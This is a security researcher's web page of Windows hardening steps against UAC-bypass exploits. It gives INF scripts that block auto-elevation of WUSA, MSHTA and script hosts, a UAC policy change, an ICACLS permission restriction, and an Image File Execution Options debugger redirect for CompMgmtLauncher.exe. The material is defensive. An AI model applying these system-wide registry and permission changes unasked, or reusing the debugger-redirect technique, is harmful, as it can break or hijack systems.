Note: always specify complete command lines in shortcuts, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigation against Exploitation of WUSA.exe

Inhibit its elevation: 
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = Registry

[Registry]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WUSA.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe

Inhibit their elevation: 
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = Registry

[Registry]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\MSHTA.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CScript.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WScript.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Mitigations against Compound Vulnerabilities

Use an unprivileged Standard User account!

Set the UAC slider to its highest position titled Always notify: 

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000002
;"ConsentPromptBehaviorUser"=dword:00000000
Additionally deny execution (for unprivileged users) in all user-writable subdirectories below %SystemRoot%\, for example via AppLocker or Software Restriction Policies alias SAFER.

Finally remove the permission for unprivileged users (really: members of the NT AUTHORITY\Authenticated Users or BUILTIN\Users groups) to create subdirectories in the root directory of the system drive: 

ICACLs.exe %SystemDrive%\ /Deny *S-1-5-32-545:(AD,WD) /Remove:d *S-1-5-32-545 /Remove:g *S-1-5-11
Disable the Diagnostics Troubleshooting Wizard: 
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics]
"EnableDiagnostics"=dword:00000000

Alternative mitigation

Launch an arbitrary other application instead of the superfluous CompMgmtLauncher.exe: 
; Copyright © 2016-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = Registry

[Registry]
HKLM,"SOFTWARE\Microsoft\Windows NT\Image File Execution Options\CompMgmtLauncher.exe","Debugger",0,"%16420%\.exe"
Download the Vulnerability and Exploit Detector SENTINEL.EXE and save it as %SystemRoot%\.exe.

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures as well as EventVwr.exe is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Installation

Download the setup script UACAMOLE.INF, then right-click to display its context menu and click Install to run the installation.
Installation requires administrative privileges and access rights.

Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe, the application registered for the Install verb of *.inf files, requests administrative privileges.

Note: on systems with AMD64 alias x64 processor architecture, the installation must be run in the native (64-bit) execution environment!

Update

The setup script supports the update from any previous version: just install the current version!

Deinstallation

Not provided.

Trivia

UACaMole is pronounced like Whack-a-Mole.

Contact

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tipps, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

Copyright © 1995–2024 • Stefan Kanthak • <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>